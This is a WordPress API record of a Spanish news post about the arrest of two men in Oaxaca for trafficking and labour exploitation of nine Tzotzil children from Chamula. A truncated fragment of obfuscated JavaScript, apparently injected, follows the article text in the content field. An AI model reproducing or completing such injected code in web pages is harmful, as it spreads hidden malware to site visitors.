{"id":16986,"date":"2024-08-03T02:43:36","date_gmt":"2024-08-03T02:43:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16986"},"modified":"2024-08-03T02:43:37","modified_gmt":"2024-08-03T02:43:37","slug":"rescatan-a-menores-de-edad-obligados-a-trabajar-en-calles-de-oaxaca-originarios-de-chamula","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16986","title":{"rendered":"Rescatan a menores de edad obligados a trabajar en calles de Oaxaca, originarios de Chamula"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"578\" height=\"1024\" data-id=\"16987\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240802-WA0120-578x1024.jpg\" alt=\"\" class=\"wp-image-16987\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240802-WA0120-578x1024.jpg 578w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240802-WA0120-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240802-WA0120.jpg 652w\" sizes=\"auto, (max-width: 578px) 100vw, 578px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"578\" height=\"1024\" data-id=\"16988\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240802-WA0119-578x1024.jpg\" alt=\"\" class=\"wp-image-16988\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240802-WA0119-578x1024.jpg 578w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240802-WA0119-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240802-WA0119.jpg 652w\" sizes=\"auto, (max-width: 578px) 100vw, 578px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>2 de agosto del 2024. SCLC.- La Fiscal\u00eda General del Estado de Oaxaca (FGEO) dio a conocer que dos personas del sexo masculino identificadas como P.J.H., alias &#8220;El C\u00e9sar&#8221; y P.J.H., alias &#8220;El Mariano&#8221;, fueron detenidos por el delito de Trata de Personas Agravado, en su modalidad de captaci\u00f3n, traslado y alojamiento con fines de Explotaci\u00f3n Laboral y Explotaci\u00f3n Laboral Agravado, en ese estado, de ni\u00f1as, ni\u00f1os y adolescentes originarios de San Juan Chamula.<\/p>\n\n\n\n<p>Este delito fue cometido en agravio de nueve ni\u00f1os y adolescentes, cuyas edades oscilan entre los 11 y 16 a\u00f1os, pertenecientes a la etnia Tzotzil de San Juan Chamula, en el estado de Chiapas, quienes viv\u00edan en condiciones insalubres y de hacinamiento en un domicilio ubicado en Calle Prolongaci\u00f3n Nu\u00f1o del Mercado de la agencia de San Juan Chapultepec, en el municipio de Oaxaca de Ju\u00e1rez, en la regi\u00f3n de los Valles Centrales.<\/p>\n\n\n\n<p>El pasado 17 de julio de 2024, a trav\u00e9s de un operativo estrat\u00e9gico derivado de las indagatorias realizadas a partir la denuncia formulada por la Procuradur\u00eda Estatal de Protecci\u00f3n de los Derechos de Ni\u00f1as, Ni\u00f1os y Adolescentes del Estado de Oaxaca (Prodennao), lograron la detenci\u00f3n de dos sujetos en flagrancia, que obligaban a los menores de edad a vender dulces y cigarros en las calles del centro de la ciudad de Oaxaca, laborando todos los d\u00edas de la semana en horarios excesivos.<\/p>\n\n\n\n<p>El rescate de los menores de edad se logr\u00f3 gracias a las investigaciones ministeriales que la FGEO a trav\u00e9s de la Vicefiscal\u00eda Regional de Valles Centrales, por lo que las v\u00edctimas quedaron bajo resguardo del Sistema Estatal para el Desarrollo Integral de la Familia (DIF).<\/p>\n\n\n\n<p>Durante el desahogo de audiencia y tras las pruebas presentadas, el Juez en turno dict\u00f3 auto de vinculaci\u00f3n a proceso a los detenidos, por el delito de Trata de Personas Agravado, decretando la medida cautelar de prisi\u00f3n preventiva justificada, concediendo un plazo de cuatro meses para el cierre de la investigaci\u00f3n complementaria.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 2 de agosto del 2024. SCLC.- La Fiscal\u00eda General del Estado de Oaxaca (FGEO) dio a conocer que dos personas del sexo masculino identificadas como P.J.H., alias &#8220;El C\u00e9sar&#8221; y P.J.H., alias &#8220;El Mariano&#8221;, fueron detenidos por el delito de Trata de Personas Agravado, en su modalidad de captaci\u00f3n, traslado y alojamiento &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16987,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16986","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16986","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16986"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16986\/revisions"}],"predecessor-version":[{"id":16989,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16986\/revisions\/16989"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16987"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16986"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16986"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16986"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}